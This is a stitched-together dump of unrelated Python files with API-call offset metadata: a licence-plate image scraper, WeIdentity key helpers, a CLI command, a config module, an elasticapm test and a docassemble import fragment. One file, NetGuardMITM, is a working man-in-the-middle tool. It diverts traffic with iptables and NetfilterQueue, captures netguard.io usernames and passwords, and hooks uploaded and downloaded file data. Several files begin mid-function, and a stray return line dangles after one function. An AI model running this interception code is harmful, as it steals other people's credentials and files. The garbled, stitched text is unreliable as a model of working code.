return "http://nummernschild.heisnbrg.net/fe/task?action=startTask&kennzeichen={0}&kennzeichenZeile2=&engschrift=false&pixelHoehe=32&breiteInMM=520&breiteInMMFest=true&sonder=FE&dd=01&mm=01&yy=00&kreis={1}&kreisName=&humm={2}&huyy={3}&sonderKreis=LEER&mm1=01&mm2=01&farbe=SCHWARZ&effekt=KEIN&tgaDownload=false".format(
license_number, country, month, year)
def __generate_license_number(self):
country = random.choice(self.COUNTRY_MARKS)
letter_count = random.randint(1, 2)
letters = "{}".format(random.choice(self.LETTERS)) if letter_count == 1 else "{}{}".format(
random.choice(self.LETTERS), random.choice(self.LETTERS))
min = 1 if letter_count == 2 else 1
digit_count = random.randint(min, max((8 - len(country) - letter_count), 4))
digits = ""
for i in range(digit_count):
digits += random.choice(self.DIGITS)
return "{}-{}{}".format(country, letters, digits)
def __create_license_plate_picture(self, n, license_number, country, front):
file_path = self.output + '/{0}#{1}.png'.format("F" if front else "R", license_number)
if os.path.exists(file_path):
return False
month = random.choice(self.MONTHS) if front else ''
year = random.choice(self.YEARS) if front else ''
create_image_url = GermanLicensePlateImagesGenerator.get_image_url(license_number, country, month, year)
r = requests.get(create_image_url)
if r.status_code != 200:
return False
id = re.compile('<id>(.*?)</id>', re.DOTALL | re.IGNORECASE).findall(
r.content.decode("utf-8"))[0]
status_url = 'http://nummernschild.heisnbrg.net/fe/task?action=status&id=%s' % id
time.sleep(.200)
r = requests.get(status_url)
if r.status_code != 200:
return False
show_image_url = 'http://nummernschild.heisnbrg.net/fe/task?action=showInPage&id=%s'
show_image_url = show_image_url % id
time.sleep(.200)
r = requests.get(show_image_url)
if r.status_code != 200:
return False
# sometimes the web service returns a corrupted image, check the image by getting the size and skip if corrupted
try:
numpyarray = np.fromstring(r.content, np.uint8)
image = cv2.imdecode(numpyarray, cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
im = Image.fromarray(image) # don't use cv2.imwrite() because there is a bug with utf-8 encoded filepaths
im.save(file_path)
print("{0:06d} : {1}".format(n, file_path))
return True
except:
return False
    def generate(self, items):
        """Generate *items* front/rear plate image pairs in the output directory.

        NOTE(review): the inner loop keeps drawing new plate numbers while the
        front-image creation *succeeds* and only breaks when it fails (e.g. the
        file already exists); the rear image is then created for the last number
        tried. This looks inverted -- confirm the intended retry semantics.
        """
        for n in range(items):
            while True:
                license_number = self.__generate_license_number()
                country = random.choice(self.COUNTRIES)
                if not self.__create_license_plate_picture(n, license_number, country, True):
                    break
                time.sleep(.200)
            self.__create_license_plate_picture(n, license_number, country, False)
            time.sleep(.200)
# Command-line entry point: parse the options and kick off plate generation.
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--items", default="60000", help="Number of items to generate")
parser.add_argument("-o", "--output", default=config.PLATE_IMAGES, help="Output path")
options = vars(parser.parse_args())
generator = GermanLicensePlateImagesGenerator(os.path.abspath(options["output"]))
generator.generate(int(options["items"]))
| [
"PIL.Image.fromarray",
"random.choice",
"argparse.ArgumentParser",
"re.compile",
"requests.get",
"random.seed",
"time.sleep",
"cv2.imdecode",
"cv2.cvtColor",
"numpy.fromstring",
"random.randint"
] | [((4263, 4288), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4286, 4288), False, 'import argparse\n'), ((819, 832), 'random.seed', 'random.seed', ([], {}), '()\n', (830, 832), False, 'import random\n'), ((1470, 1503), 'random.choice', 'random.choice', (['self.COUNTRY_MARKS'], {}), '(self.COUNTRY_MARKS)\n', (1483, 1503), False, 'import random\n'), ((1528, 1548), 'random.randint', 'random.randint', (['(1)', '(2)'], {}), '(1, 2)\n', (1542, 1548), False, 'import random\n'), ((2499, 2529), 'requests.get', 'requests.get', (['create_image_url'], {}), '(create_image_url)\n', (2511, 2529), False, 'import requests\n'), ((2808, 2823), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (2818, 2823), False, 'import time\n'), ((2837, 2861), 'requests.get', 'requests.get', (['status_url'], {}), '(status_url)\n', (2849, 2861), False, 'import requests\n'), ((3067, 3082), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (3077, 3082), False, 'import time\n'), ((3096, 3124), 'requests.get', 'requests.get', (['show_image_url'], {}), '(show_image_url)\n', (3108, 3124), False, 'import requests\n'), ((1928, 1954), 'random.choice', 'random.choice', (['self.DIGITS'], {}), '(self.DIGITS)\n', (1941, 1954), False, 'import random\n'), ((2271, 2297), 'random.choice', 'random.choice', (['self.MONTHS'], {}), '(self.MONTHS)\n', (2284, 2297), False, 'import random\n'), ((2330, 2355), 'random.choice', 'random.choice', (['self.YEARS'], {}), '(self.YEARS)\n', (2343, 2355), False, 'import random\n'), ((3343, 3377), 'numpy.fromstring', 'np.fromstring', (['r.content', 'np.uint8'], {}), '(r.content, np.uint8)\n', (3356, 3377), True, 'import numpy as np\n'), ((3398, 3440), 'cv2.imdecode', 'cv2.imdecode', (['numpyarray', 'cv2.IMREAD_COLOR'], {}), '(numpyarray, cv2.IMREAD_COLOR)\n', (3410, 3440), False, 'import cv2\n'), ((3461, 3500), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2GRAY'], {}), '(image, cv2.COLOR_BGR2GRAY)\n', (3473, 3500), False, 'import 
cv2\n'), ((3518, 3540), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (3533, 3540), False, 'from PIL import Image\n'), ((1579, 1606), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1592, 1606), False, 'import random\n'), ((1661, 1688), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1674, 1688), False, 'import random\n'), ((1690, 1717), 'random.choice', 'random.choice', (['self.LETTERS'], {}), '(self.LETTERS)\n', (1703, 1717), False, 'import random\n'), ((3952, 3981), 'random.choice', 'random.choice', (['self.COUNTRIES'], {}), '(self.COUNTRIES)\n', (3965, 3981), False, 'import random\n'), ((4119, 4134), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4129, 4134), False, 'import time\n'), ((4239, 4254), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (4249, 4254), False, 'import time\n'), ((2602, 2657), 're.compile', 're.compile', (['"""<id>(.*?)</id>"""', '(re.DOTALL | re.IGNORECASE)'], {}), "('<id>(.*?)</id>', re.DOTALL | re.IGNORECASE)\n", (2612, 2657), False, 'import re\n')] |
# -*- coding:utf8 -*-
import os
from eth_account import Account
import sha3
import base64
import hashlib
from ecdsa import SigningKey, SECP256k1
DID_TYPE = ["weid"]
def create_privkey():
    """Return 32 cryptographically random bytes for use as a raw private key."""
    key_bytes = os.urandom(32)
    return key_bytes
def create_ecdsa_privkey():
    """Create a fresh ECDSA signing key on the secp256k1 curve."""
    signing_key = SigningKey.generate(curve=SECP256k1)
    return signing_key
def create_random_weid():
    """Generate a brand-new weid record from a freshly created private key."""
    # Derive an address from a newly generated private key.
    new_key = create_privkey()
    account = generate_addr(priv=new_key.hex())
    payload = account["payload"]
    # Build the weid; the CHAIN_ID placeholder is filled in when it goes on chain.
    weid = "did:weid:CHAIN_ID:{addr}".format(addr=payload["addr"])
    return {
        "privateKeyHex": payload["priv"],
        "publicKeyHex": payload["pubv"],
        "privateKeyInt": str(int(payload["priv"], 16)),
        "publicKeyInt": str(int(payload["pubv"], 16)),
        "weId": weid,
    }
def create_watting_weid(privkey):
    """Build a weid record (without a chain-id segment) from a hex private key."""
    account = generate_addr(priv=privkey)
    payload = account["payload"]
    # Assemble the weid directly from the derived address; no chain id here.
    weid = "did:weid:{addr}".format(addr=payload["addr"])
    return {
        "privateKeyHex": payload["priv"],
        "publicKeyHex": payload["pubv"],
        "privateKeyInt": str(int(payload["priv"], 16)),
        "publicKeyInt": str(int(payload["pubv"], 16)),
        "weId": weid,
    }
def create_weid_by_privkey(privkey, chain_id):
    """Derive a weid on *chain_id* from a private key given as hex or decimal text."""
    # Accept either a 0x-prefixed hex string or a decimal string.
    if privkey[:2] == "0x":
        account = generate_addr(priv=privkey[2:])
    else:
        account = generate_addr(priv=hex(int(privkey))[2:])
    payload = account["payload"]
    weid = "did:weid:{chain_id}:{addr}".format(chain_id=chain_id, addr=payload["addr"])
    return {
        "privateKeyHex": payload["priv"],
        "publicKeyHex": payload["pubv"],
        "privateKeyInt": str(int(payload["priv"], 16)),
        "publicKeyInt": str(int(payload["pubv"], 16)),
        "weid": weid,
    }
def generate_addr(priv=None):
    """Create an Ethereum-style account and return its address/key material.

    :param priv: optional private key; when None a new random account is created
    :return: {"result": "success", "payload": {...}} on success, or
             {"result": "error", "error": <exception>} when the key is invalid
    """
    if priv is None:  # identity comparison is the idiomatic None check
        account = Account.create()
    else:
        try:
            account = Account.privateKeyToAccount(priv)
        except Exception as e:
            return {"result": "error", "error": e}
    return {"result": "success",
            "payload":
                {"addr": account.address,
                 "priv": account.privateKey.hex(),
                 # NOTE: reaches into eth_account's private _key_obj -- fragile.
                 "pubv": str(account._key_obj.public_key).lower()
                 }}
def update_did_chain_id(did, chain_id):
    """Replace the CHAIN_ID placeholder inside *did* with the actual chain id."""
    parts = did.split("CHAIN_ID")
    # Keep the tail segment, then overwrite the placeholder slot with the chain id.
    parts.append(parts[1])
    parts[1] = chain_id
    return "".join(parts)
def verify_did(did):
    """Check that *did* looks like a well-formed weid.

    Returns True when valid, otherwise a human-readable error message string.
    """
    segments = did.split(":")
    if segments[0] != "did":
        return "请提供正确的did。"
    if segments[1] not in DID_TYPE:
        return "请提供正确的DID Type。"
    # The chain-id segment (segments[2]) is intentionally not validated here.
    if segments[3][:2] != "0x":
        return "请输入正确的did。"
    return True
def Hash(msg):
    """Return the keccak-256 digest of *msg* (bytes) as a hex string."""
    digest = sha3.keccak_256()
    digest.update(msg)
    return digest.hexdigest()
def ethtype_to_int_priv_pubv(priv, pubv):
    """Convert an eth-style key pair into the decimal string form WeIdentity expects.

    :param priv: private key as bytes
    :param pubv: public key as a hex string (e.g. "0x04ab...")
    :return: {"priv": <decimal string>, "pubv": <decimal string>}
    """
    private_key = int.from_bytes(priv, byteorder='big', signed=False)
    # Parse the hex string explicitly instead of eval()-ing it: eval on
    # externally supplied key material is a code-execution hazard.
    public_key = int(pubv, 16)
    return {"priv": str(private_key), "pubv": str(public_key)}
def int_to_ethtype_priv_pubv(priv, pubv):
    # TODO: intended inverse of ethtype_to_int_priv_pubv -- not implemented yet.
    pass
def base64_decode(base_data):
    """Decode a base64 payload.

    :param base_data: base64-encoded str or bytes
    :return: the decoded raw bytes
    """
    return base64.b64decode(base_data)
def base64_encode(bytes_data):
    """Encode raw bytes as a base64 text string.

    :param bytes_data: raw bytes to encode
    :return: the base64 representation as str
    """
    encoded = base64.b64encode(bytes_data)
    return encoded.decode()
def binary_to_list(bin):
    """Expand a bytes-like value into a list of its integer byte values.

    :param bin: bytes/bytearray (any iterable works)
    :return: list of the elements, e.g. b"\\x01" -> [1]
    """
    # list() iterates the input directly; the previous manual enumerate loop
    # never used the index and was pure boilerplate.
    return list(bin)
def list_to_binary(list):
    """Pack a list of integer byte values (0-255) back into bytes.

    :param list: iterable of ints in range(256)
    :return: bytes, e.g. [1] -> b"\\x01"
    """
    # bytes(iterable_of_ints) does this in one C-level pass; the old loop
    # concatenated one-byte strings and was quadratic.
    return bytes(list)
def ecdsa_sign(encode_transaction, privkey):
    """Sign a base64-encoded transaction with a secp256k1 key.

    :param encode_transaction: the transaction, base64-encoded
    :param privkey: private key as raw bytes or a hex string
    :return: the signature, base64-encoded
    """
    key_material = bytes.fromhex(privkey) if isinstance(privkey, str) else privkey
    signing_key = SigningKey.from_string(key_material, curve=SECP256k1)
    # Decode the transaction, hash it with keccak-256, then sign the digest.
    raw_transaction = base64_decode(encode_transaction)
    digest_hex = Hash(raw_transaction)
    digest = bytes(bytearray.fromhex(digest_hex))
    signature = signing_key.sign(digest, hashfunc=hashlib.sha256)
    # Hand the signature back base64-encoded.
    return base64_encode(signature)
return transaction_encode | [
"eth_account.Account.create",
"os.urandom",
"base64.b64encode",
"ecdsa.SigningKey.generate",
"base64.b64decode",
"sha3.keccak_256",
"eth_account.Account.privateKeyToAccount",
"ecdsa.SigningKey.from_string"
] | [((199, 213), 'os.urandom', 'os.urandom', (['(32)'], {}), '(32)\n', (209, 213), False, 'import os\n'), ((254, 290), 'ecdsa.SigningKey.generate', 'SigningKey.generate', ([], {'curve': 'SECP256k1'}), '(curve=SECP256k1)\n', (273, 290), False, 'from ecdsa import SigningKey, SECP256k1\n'), ((3070, 3087), 'sha3.keccak_256', 'sha3.keccak_256', ([], {}), '()\n', (3085, 3087), False, 'import sha3\n'), ((3648, 3675), 'base64.b64decode', 'base64.b64decode', (['base_data'], {}), '(base_data)\n', (3664, 3675), False, 'import base64\n'), ((3811, 3839), 'base64.b64encode', 'base64.b64encode', (['bytes_data'], {}), '(bytes_data)\n', (3827, 3839), False, 'import base64\n'), ((4233, 4281), 'ecdsa.SigningKey.from_string', 'SigningKey.from_string', (['privkey'], {'curve': 'SECP256k1'}), '(privkey, curve=SECP256k1)\n', (4255, 4281), False, 'from ecdsa import SigningKey, SECP256k1\n'), ((2081, 2097), 'eth_account.Account.create', 'Account.create', ([], {}), '()\n', (2095, 2097), False, 'from eth_account import Account\n'), ((2143, 2176), 'eth_account.Account.privateKeyToAccount', 'Account.privateKeyToAccount', (['priv'], {}), '(priv)\n', (2170, 2176), False, 'from eth_account import Account\n')] |
import os
from .abstract_command import AbstractCommand
from ..services.state_utils import StateUtils
from ..services.state import StateHolder
from ..services.command_handler import CommandHandler
from ..services.console_logger import ColorPrint
class Start(AbstractCommand):
    """Poco 'start'/'up' command: runs checkouts and dispatches the start plan."""
    command = ["start", "up"]
    args = ["[<project/plan>]"]
    args_descriptions = {"[<project/plan>]": "Name of the project in the catalog and/or name of the project's plan"}
    description = "Run: 'poco start nginx/default' or 'poco up nginx/default' to start nginx project (docker, helm " \
                  "or kubernetes) with the default plan."
    run_command = "start"
    need_checkout = True
    def prepare_states(self):
        """Resolve the project name/work dir and make sure a compose handler exists."""
        StateUtils.calculate_name_and_work_dir()
        StateUtils.prepare("compose_handler")
    def resolve_dependencies(self):
        """Abort for catalog projects without a repository, then require a poco file."""
        if StateHolder.catalog_element is not None and not StateUtils.check_variable('repository'):
            ColorPrint.exit_after_print_messages(message="Repository not found for: " + str(StateHolder.name))
        self.check_poco_file()
    def execute(self):
        """Run checkouts (when enabled) and hand the command to the handler."""
        if self.need_checkout:
            StateHolder.compose_handler.run_checkouts()
        CommandHandler().run(self.run_command)
        if hasattr(self, "end_message"):
            ColorPrint.print_info(getattr(self, "end_message"))
    @staticmethod
    def check_poco_file():
        """Exit with a helpful message when no poco.yml can be located."""
        if not StateUtils.check_variable('poco_file'):
            poco_file = str(StateHolder.repository.target_dir if StateHolder.repository is not None
                            else os.getcwd()) + '/poco.yml'
            ColorPrint.print_error(message="Poco file not found: " + poco_file)
            ColorPrint.exit_after_print_messages(message="Use 'poco init " + StateHolder.name +
                                                         "', that will generate a default poco file for you",
                                                 msg_type="warn")
| [
"os.getcwd"
] | [((1590, 1601), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1599, 1601), False, 'import os\n')] |
from netfilterqueue import NetfilterQueue
import socket
from os import system
import scapy.all as scapy
import scapy_http.http
from urllib.parse import urlparse, parse_qs
REQUEST_LOGIN = 0
REQUEST_PROTECT = 1
class NetGuardMITM:
    """Man-in-the-middle helper that inspects netguard.io HTTP traffic via NFQUEUE.

    Packets are diverted through a NetfilterQueue; registered callbacks can
    observe (and veto, by returning False) login/protect API requests, their
    responses, and the upload/download payload chunks of file transfers.
    """
    def __init__(self, ip, queue_number=1):
        # IP address whose traffic is diverted into the netfilter queue.
        self.ip = ip
        self.queue_number = queue_number
        # Optional observer hooks; each may return False to drop the packet.
        self.log_callback = None
        self.netguard_server_ip = None
        self.login_request_callback = None
        self.protect_request_callback = None
        self.login_response_callback = None
        self.protect_response_callback = None
        self.file_upload_packet_callback = None
        self.file_download_packet_callback = None
        # Tracks a request/response body transfer that spans multiple packets.
        self.file_transfer_in_progress = False
        self.file_transfer_bytes_remaining = 0
        # Last API call seen; used to pair a response with its request.
        self.__last_request = None
    def log(self, message):
        """Forward *message* to the configured log callback, if any."""
        if self.log_callback:
            self.log_callback(message)
    def packet_callback(self, raw_packet):
        """
        Main call back of sent and received packets.
        :param raw_packet: The packet that is being sent/received.
        """
        packet = scapy.IP(raw_packet.get_payload())
        accept = True
        if packet.haslayer("HTTP"):
            tcp_layer = packet.getlayer("TCP")
            http_layer = packet.getlayer("HTTP")
            # Mid-transfer payload chunks are routed by direction relative to the server.
            if packet.haslayer("Raw") and self.file_transfer_in_progress:
                if packet.dst == self.netguard_server_ip:
                    accept = self.handle_file_upload_packet(raw_packet, packet)
                elif packet.src == self.netguard_server_ip:
                    accept = self.handle_file_download_packet(raw_packet, packet)
                else:
                    accept = True
            if "HTTP Request" in http_layer:
                accept = self.handle_request(raw_packet, packet)
            elif "HTTP Response" in http_layer:
                accept = self.handle_response(raw_packet, packet)
        if accept:
            raw_packet.accept()
        else:
            raw_packet.drop()
    def handle_request(self, raw_packet, packet):
        """
        Handles HTTP requests sent towards netguard.io. All other requests are ignored and therefore accepted.
        :param raw_packet: The raw packet as obtained by NetfilterQueue
        :param packet: The scapy representation of the HTTP packet.
        :return True if the packet should be accepted, False otherwise.
        """
        accept = True
        http_layer = packet.getlayer("HTTP")
        request = http_layer["HTTP Request"]
        if request.Host != b"netguard.io":
            return accept
        # Record the (current) netguard.io IP.
        self.netguard_server_ip = packet.dst
        # Parse URL.
        o = urlparse(request.Path)
        arguments = parse_qs(o.query)
        # Check which API call is being made and invoke corresponding callback.
        if request.Method == b"GET":
            if o.path == b"/API/login.php" and self.login_request_callback:
                self.__last_request = REQUEST_LOGIN
                accept = self.login_request_callback(raw_packet, packet, arguments[b"username"], arguments[b"password"])
        elif request.Method == b"POST":
            if o.path == b"/API/protect.php":
                if self.protect_request_callback:
                    accept = self.protect_request_callback(raw_packet, packet, arguments[b"username"], arguments[b"password"])
                self.__last_request = REQUEST_PROTECT
                # The POST body (the file being protected) follows in later packets.
                self.file_transfer_in_progress = True
                self.file_transfer_bytes_remaining = int(request.fields["Content-Length"])
        return accept
    def handle_response(self, raw_packet, packet):
        """
        Handles a single HTTP response from netguard.io. All other responses are ignored and therefore accepted.
        :param raw_packet: The raw packet as obtained by NetfilterQueue.
        :param packet: The scapy representation of the HTTP packet.
        :return: True if the packet should be accepted, False otherwise.
        """
        accept = True
        if packet.src != self.netguard_server_ip:
            return accept
        http_layer = packet.getlayer("HTTP")
        response = http_layer["HTTP Response"]
        body = packet.getlayer("Raw")
        # NOTE: We assume that the response comes directly after the request.
        # This might not be accurate, as packets can be reordered during the transmission.
        # For more reliable results, check sequence numbers of packets.
        # Check what kind of response we're dealing with.
        if self.__last_request == REQUEST_LOGIN and self.login_response_callback:
            accept = self.login_response_callback(raw_packet, packet, body)
            self.__last_request = None
        elif self.__last_request == REQUEST_PROTECT:
            if self.protect_response_callback:
                accept = self.protect_response_callback(raw_packet, packet, body)
            if "Content-Length" in response.fields:
                self.file_transfer_in_progress = True
                self.file_transfer_bytes_remaining = int(response.fields["Content-Length"])
                self.handle_file_download_packet(raw_packet, packet)
            self.__last_request = None
        return accept
    def handle_file_upload_packet(self, raw_packet, packet):
        """
        Handles a single HTTP packet containing (a chunk of) the file to be uploaded to netguard.io.
        :param raw_packet: The raw packet as obtained by NetfilterQueue.
        :param packet: The scapy representation of the HTTP packet.
        :return: True if the packet should be accepted, False otherwise.
        """
        accept = True
        raw_layer = packet.getlayer("Raw")
        self.file_transfer_bytes_remaining -= len(raw_layer.load)
        if self.file_upload_packet_callback:
            accept = self.file_upload_packet_callback(raw_packet, packet, raw_layer.load, self.file_transfer_bytes_remaining)
        self.file_transfer_in_progress = self.file_transfer_bytes_remaining > 0
        return accept
    def handle_file_download_packet(self, raw_packet, packet):
        """
        Handles a single HTTP packet containing (a chunk of) the protected file that is being downloaded from
        the netguard.io server.
        :param raw_packet: The raw packet as obtained by NetfilterQueue.
        :param packet: The scapy representation of the HTTP packet.
        :return: True if the packet should be accepted, False otherwise.
        """
        accept = True
        raw_layer = packet.getlayer("Raw")
        self.file_transfer_bytes_remaining -= len(raw_layer.load)
        if self.file_download_packet_callback:
            accept = self.file_download_packet_callback(raw_packet, packet, raw_layer.load, self.file_transfer_bytes_remaining)
        self.file_transfer_in_progress = self.file_transfer_bytes_remaining > 0
        return accept
    def do_mitm(self):
        """
        Performs the man-in-the-middle attack. This function is blocking.
        """
        try:
            # Add necessary IP table entries.
            self.log("Updating IP tables...")
            system("iptables -A INPUT -d {} -p tcp -j NFQUEUE --queue-num {}".format(self.ip, self.queue_number))
            system("iptables -A OUTPUT -s {} -p tcp -j NFQUEUE --queue-num {}".format(self.ip, self.queue_number))
            # Bind to filter queue.
            nfqueue = NetfilterQueue()
            nfqueue.bind(self.queue_number, self.packet_callback)
            s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM)
            try:
                self.log("Running MITM...")
                nfqueue.run_socket(s)
            except KeyboardInterrupt:
                pass
            self.log("Closing sockets...")
            s.close()
            nfqueue.unbind()
        finally:
            # Remove IP table entries.
            self.log("Restoring IP tables.")
            system("iptables -D INPUT 1")
            system("iptables -D OUTPUT 1")
| [
"urllib.parse.parse_qs",
"os.system",
"urllib.parse.urlparse",
"netfilterqueue.NetfilterQueue"
] | [((2749, 2771), 'urllib.parse.urlparse', 'urlparse', (['request.Path'], {}), '(request.Path)\n', (2757, 2771), False, 'from urllib.parse import urlparse, parse_qs\n'), ((2792, 2809), 'urllib.parse.parse_qs', 'parse_qs', (['o.query'], {}), '(o.query)\n', (2800, 2809), False, 'from urllib.parse import urlparse, parse_qs\n'), ((7486, 7502), 'netfilterqueue.NetfilterQueue', 'NetfilterQueue', ([], {}), '()\n', (7500, 7502), False, 'from netfilterqueue import NetfilterQueue\n'), ((8025, 8054), 'os.system', 'system', (['"""iptables -D INPUT 1"""'], {}), "('iptables -D INPUT 1')\n", (8031, 8054), False, 'from os import system\n'), ((8067, 8097), 'os.system', 'system', (['"""iptables -D OUTPUT 1"""'], {}), "('iptables -D OUTPUT 1')\n", (8073, 8097), False, 'from os import system\n')] |
"""Config options for WDRAX.
Gets settings from environment variables or .env/settings.ini file.
"""
import pathlib
from decouple import AutoConfig
# Project root used to locate the settings file and default directories.
# NOTE(review): pathlib.Path(__name__) builds a path from the *module name*,
# so BASE_DIR effectively resolves relative to the current working directory;
# this looks like it was meant to be __file__ -- confirm before changing.
BASE_DIR = pathlib.Path(__name__).absolute().parent
config = AutoConfig(search_path=str(BASE_DIR))  # pylint: disable=invalid-name
LOG_LEVEL = config('LOG_LEVEL', default='INFO')
#: Directory from which plugins are loaded
PLUGIN_DIR = config('PLUGIN_DIR',
                    cast=pathlib.Path,
                    default=BASE_DIR.joinpath('plugins'))
#: Directory into which output zip files should be placed
OUTPUT_DIR = config('OUTPUT_DIR',
                    cast=pathlib.Path,
                    default=BASE_DIR.joinpath('media'))
# Redis connection settings; REDIS_HOST=None leaves the broker URL unset.
REDIS_HOST = config('REDIS_HOST', default=None)
REDIS_PORT = config('REDIS_PORT', cast=int, default=6379)
REDIS_DB = config('REDIS_DB', default='0')
# Celery broker/result backend default to the Redis instance configured above.
CELERY_BROKER_URL = config(
    'CELERY_BROKER_URL',
    default=(None if REDIS_HOST is None else
             f'redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_DB}'))
CELERY_RESULT_BACKEND = config(
    'CELERY_RESULT_BACKEND',
    default=CELERY_BROKER_URL
)
# Default database is a local SQLite file next to the project root.
SQLALCHEMY_DATABASE_URI = config(
    'SQLALCHEMY_DATABASE_URI',
    default=f'sqlite:///{BASE_DIR.joinpath("db.sqlite3")}')
# Dotted paths of the tweet-provider callables used for extraction.
TWEET_PROVIDERS = [
    'wdra_extender.extract.tweet_providers.redis_provider',
    'wdra_extender.extract.tweet_providers.twarc_provider',
]
# Twitter API credentials; all default to None and come from the environment.
TWITTER_CONSUMER_KEY = config('TWITTER_CONSUMER_KEY', default=None)
TWITTER_CONSUMER_SECRET = config('TWITTER_CONSUMER_SECRET', default=None)
TWITTER_ACCESS_TOKEN = config('TWITTER_ACCESS_TOKEN', default=None)
TWITTER_ACCESS_TOKEN_SECRET = config('TWITTER_ACCESS_TOKEN_SECRET', default=None)
SQLALCHEMY_TRACK_MODIFICATIONS = False
| [
"pathlib.Path"
] | [((163, 185), 'pathlib.Path', 'pathlib.Path', (['__name__'], {}), '(__name__)\n', (175, 185), False, 'import pathlib\n')] |
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import random
import shutil
import sys
import tempfile
import pytest
from elasticapm.contrib.zerorpc import Middleware
# Skip the whole module when the optional zerorpc/gevent test deps are absent.
zerorpc = pytest.importorskip("zerorpc")
gevent = pytest.importorskip("gevent")
# zerorpc is known to fail on PyPy releases older than 2.6.
has_unsupported_pypy = hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 6)
@pytest.mark.skipif(has_unsupported_pypy, reason="Failure with pypy < 2.6")
def test_zerorpc_middleware_with_reqrep(elasticapm_client):
    """Exercise the zerorpc middleware end to end over a req/rep ipc socket."""
    work_dir = tempfile.mkdtemp()
    endpoint = "ipc://{0}".format(os.path.join(work_dir, "random_zeroserver"))
    try:
        # Install the APM middleware and expose the stdlib `random` module via RPC.
        zerorpc.Context.get_instance().register_middleware(Middleware(client=elasticapm_client))
        server = zerorpc.Server(random)
        server.bind(endpoint)
        gevent.spawn(server.run)
        client = zerorpc.Client()
        client.connect(endpoint)
        # random.choice([]) raises IndexError remotely; the middleware must capture it.
        with pytest.raises(zerorpc.exceptions.RemoteError) as raised:
            client.choice([])
        client.close()
        server.close()
    finally:
        shutil.rmtree(work_dir, ignore_errors=True)
    remote_error = raised.value
    assert remote_error.name == "IndexError"
    assert len(elasticapm_client.events) == 1
    captured = elasticapm_client.events[0]["errors"][0]["exception"]
    assert captured["type"] == "IndexError"
    stack = captured["stacktrace"]
    assert stack[0]["function"] == "choice"
    assert stack[0]["module"] == "random"
    assert captured["handled"] is False
| [
"elasticapm.contrib.zerorpc.Middleware",
"os.path.join",
"pytest.mark.skipif",
"pytest.importorskip",
"tempfile.mkdtemp",
"pytest.raises",
"shutil.rmtree"
] | [((1734, 1764), 'pytest.importorskip', 'pytest.importorskip', (['"""zerorpc"""'], {}), "('zerorpc')\n", (1753, 1764), False, 'import pytest\n'), ((1774, 1803), 'pytest.importorskip', 'pytest.importorskip', (['"""gevent"""'], {}), "('gevent')\n", (1793, 1803), False, 'import pytest\n'), ((1901, 1975), 'pytest.mark.skipif', 'pytest.mark.skipif', (['has_unsupported_pypy'], {'reason': '"""Failure with pypy < 2.6"""'}), "(has_unsupported_pypy, reason='Failure with pypy < 2.6')\n", (1919, 1975), False, 'import pytest\n'), ((2049, 2067), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (2065, 2067), False, 'import tempfile\n'), ((2109, 2150), 'os.path.join', 'os.path.join', (['tmpdir', '"""random_zeroserver"""'], {}), "(tmpdir, 'random_zeroserver')\n", (2121, 2150), False, 'import os\n'), ((2613, 2654), 'shutil.rmtree', 'shutil.rmtree', (['tmpdir'], {'ignore_errors': '(True)'}), '(tmpdir, ignore_errors=True)\n', (2626, 2654), False, 'import shutil\n'), ((2220, 2256), 'elasticapm.contrib.zerorpc.Middleware', 'Middleware', ([], {'client': 'elasticapm_client'}), '(client=elasticapm_client)\n', (2230, 2256), False, 'from elasticapm.contrib.zerorpc import Middleware\n'), ((2457, 2502), 'pytest.raises', 'pytest.raises', (['zerorpc.exceptions.RemoteError'], {}), '(zerorpc.exceptions.RemoteError)\n', (2470, 2502), False, 'import pytest\n')] |
from bs4 import BeautifulSoup as Soup
import re
import json
import sys
import shutil
import tempfile
import os
import subprocess
from pathlib import Path
from docassemble.base.util import log, path_and_mimetype, validation_error, DADict, DAList, Individual, value, force_ask, space_to_underscore
